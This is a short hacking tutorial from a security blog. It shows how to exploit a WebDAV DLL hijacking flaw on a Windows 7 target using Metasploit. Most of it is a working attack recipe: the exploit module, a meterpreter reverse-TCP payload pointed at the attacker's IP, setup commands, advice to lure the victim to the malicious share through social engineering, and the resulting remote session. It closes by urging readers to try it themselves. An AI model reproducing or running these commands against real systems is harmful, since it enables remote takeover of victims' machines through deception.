Through this article, you will learn WebDAV application DLL hijacking exploitation using Metasploit framework and try to hack the victim through malicious code execution.

Attacker: Kali Linux

Target: Window 7 (torrent)

Let’s start!!!

Open the terminal and type msfconsole to load metasploit framework.

This module presents a directory of file extensions that can lead to code execution when opened from the share. The default EXTENSIONS option must be configured to specify a vulnerable application type.

use exploit/windows/browser/webdav_dll_hijacker

msf exploit(webdav_dll_hijacker) >set payload windows/meterpreter/reverse_tcp

msf exploit(webdav_dll_hijacker) >set lhost 192.168.0.107

msf exploit(webdav_dll_hijacker) >set extensions torrent

msf exploit(webdav_dll_hijacker) >exploit

It has generate a malicious code which you can perceive from screenshot the highlighted text \\192.168.0.107\documents\, so now being an attacker you are suggested to share this link to your targeted client using social engineering.

Once you have shared malicious code link to the client then must for your meterpreter session, now when client will open the link he will be intended to a document folder with many file extensions and attacker will receive his meterpreter session.

Hence meterpreter session 1 opened successfully now we are connected with target through port 4444.

msf exploit(webdav_dll_hijacker) >sessions 1

meterpreter> sysinfo

 NOW TRY YOURSELF GOOD LUCK!!!

Author: AArti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here